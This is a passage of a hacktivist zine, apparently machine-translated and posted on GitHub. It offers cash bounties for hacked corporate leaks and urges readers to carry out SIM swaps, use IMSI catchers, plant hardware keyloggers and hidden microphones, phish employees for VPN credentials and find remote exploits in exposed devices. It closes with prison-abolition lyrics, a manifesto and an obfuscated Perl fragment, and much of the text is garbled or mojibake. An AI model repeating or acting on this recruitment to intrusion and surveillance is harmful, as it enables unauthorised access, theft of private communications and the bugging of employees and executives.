consequences of its activity [1]). But if you hack them directly, you'll have
to dive between an incredible amount of boring information about
Your daily operations. Very likely it will be much easier
find something interesting if instead you focus on your lobbyists [2]. Other
way to select viable goals is by reading stories from journalists from
research (like [3]), which are interesting but lack evidence
solid. And that is exactly what your hacks can find.
I will pay up to 100 thousand USD for each leak of this type, according to the interest
public and impact of the material, and the required labor in the hacking. Needless to say
that a complete filtering of documents and internal communications of
one of these companies will be a benefit for the society that exceeds
those one hundred thousand, but I'm not trying to enrich anyone. I just want to provide
of sufficient funds so that hackers can earn a decent living
doing a good job. Due to time constraints and considerations of
security I will not open the material, nor inspect it for myself, but that
I will read what the press says about it once it has been published, and I will make a
estimate of public interest from there. My contact information is
at the end of the guide mentioned before [4].
How you get the material is your thing. You can use traditional techniques
of hacking outlined in this guide and the previous one [4]. Could you make a sim
swap [5] to a corrupt businessman or politician, and then download his emails and
backups from the cloud. You can order an IMSI catcher from alibaba and use it outside
of its offices. You can do some war-driving (old or new
[6]). You may be a person within your organizations that already has
access. You can opt for a low-tech old-school style like in [7] and [8], and
Simply sneak into their offices. Whatever works for you.
Sep / 19 / shell-and-exxons-secret-1980s-climate-change-warnings
is-my-keyboard /
---- [14.1 - Partial payments] ---------------------------------------- ----------
Are you a good-hearted waitress working in a company of evil [1]?
Would you be willing to sneak a physical keylogger into the
an executive's computer, to change its USB charging cable for a modified one
[2], hide a mike in a meeting room where they plan their
atrocities, or to leave one of these [3] forgotten in some corner of the
Are you good with social engineering and phishing, and did you get a shell in the
an employee's computer, or there you got your vpn credentials
using phishing? But maybe you couldn't get domain admin and download
what you wanted
Did you participate in bug bounties programs and become an expert in
web application hacking, but you don't have enough hacker experience
to completely penetrate the company?
Do you have facility with reverse engineering? Scan some evil companies
to see what devices are exposed to the internet (firewall, vpn, and
email gateways will be much more useful than things like cameras
IP), apply reverse engineering and find some exploitable vulnerability
remote form.
If I can work with you to penetrate the company and get material
of public interest, you will also be rewarded for your work. If not
I have the time to work on it myself, at least I will try to advise you
about how to continue until you can complete the hacking on your own.
Support those in power to hack and monitor dissidents, activists and
to the general population today is an industry of several billion
of dollars while hacking and exposing those in power is a
voluntary and risky work. Turn it into a multi-million industry
of dollars is certainly not going to fix that power imbalance, nor is it going to
solve the problems of society. But I think it will be fun. So
that ... I want to see people starting to collect their rewards!
- [15 - Abolish prisons] ----------------------------------------- --------
Construidas por el enemigo pa encerrar ideas
encerrando compañeros pa acallar gritos de guerra
es el centro de tortura y aniquilamiento
donde el ser humano se vuelve más violento
es el reflejo de la sociedad, represiva y carcelaria
sostenida y basada en lógicas autoritarias
custodiadas reprimidos y vigilados
miles de presas y presos son exterminados
ante esta máquina esquizofrénica y despiadada
compañero Axel Osorio dando la pela en la cana
rompiendo el aislamiento y el silenciamiento
fuego y guerra a la cárcel, vamos destruyendo!
Rap Insurrecto - Palabras En Conflicto
It would be typical to end a zine hacker saying release hammond, release
Manning, release Hamza, release the detainees by mounting the деР»Ð¾ Сети,
etc. I will take this tradition to its most radical consequence [1], and to say:
We have to abolish prisons now! Being a criminal myself, they can
To think that what happens is that I have a slightly skewed view of the matter.
But seriously, it's not even a controversial issue, even the UN is
practically agree [2]. So, once and for all, free people
migrants [3] [4] [5] [6], often imprisoned by those same countries that created
the war and the environmental and economic destruction from which they flee. Free
all who are in prison for war against those who use drugs [7].
Free all people imprisoned for war against the poor [8].
The only thing they do is hide and ignore the evidence of
existence of social problems, instead of actually fixing them. Y
until everyone is released, fight the prison system by remembering and
keeping in mind those who are trapped in there. Send them honey,
letters, helicopters [9], pirate radios [10] and books, and supports those who
organized from in there [11] [12].
[8] VI, 2. i. The unpaid fine:
sci_arttext & pid = S0718-00122012000100005
[9] p. 10, Libelo No. 2. Political bulletin from the High Security Prison
- [16 - Conclusion] ------------------------------------------- ----------------
Our world is upside down [1]. We have a justice system that
Represents injustice. Law and order are there to create an illusion
of social peace, and hide the systematic and deep exploitation, the
violence, and injustice. Better follow your conscience, and not the law.
Businessmen get rich by mistreating people and the planet,
while care work is largely unpaid. Through the
assault on everything communal, somehow we have built cities densely
populated, plagued by loneliness and isolation. The cultural system,
political and economic in which we live encourages the worst facets of nature
human: greed, selfishness and self-centeredness, competitiveness, lack of
compassion and attachment for authority. So, for whoever got
remain sensitive and compassionate in a cold world, for all heroes
everyday practices of goodness in small things, for all of you who
they still have a burning star in their hearts: гоpи, гоpи Ñ Ñ Ð½Ð¾, Ñ ‡ тоР± Ñ ‹Ð½Ðµ
погР° Ñ Ð »Ð¾!
< ¡Cantemos juntas! >
\ ^__^
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
Ábrete corazón
Ábrete sentimiento
Ábrete entendimiento
Deja a un lado la razón
Y deja brillar el sol escondido en tu interior
perl -Mre=eval <<\EOF
.('['^'#').("\`"| ')').('`'|'#').(
'`'|'!').('`'| '.').('`'|'/')
.'..)/'.('[' ^'(').'"})')
;$:="\."^ '~';$~='@'
|'(';$^= ')'^'[';
$/='`' |'.';
$,= '('
Nosotras nacimos de la noche.
en ella vivimos, hackeamos en ella.
Aquí estamos, somos la dignidad rebelde,
el corazón olvidado de la Интернет.
Nuestra lucha es por la memoria y la justicia,
y el mal gobierno se llena de criminales y asesinos.
Nuestra lucha es por un trabajo justo y digno,
y el mal gobierno y las corporaciones compran y venden zero days.
Para todas el mañana.
Para nosotras la alegre rebeldía de las filtraciones
y la expropiación.
Para todas todo.
Para nosotras nada.
Desde las montañas del Sureste Cibernético,
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment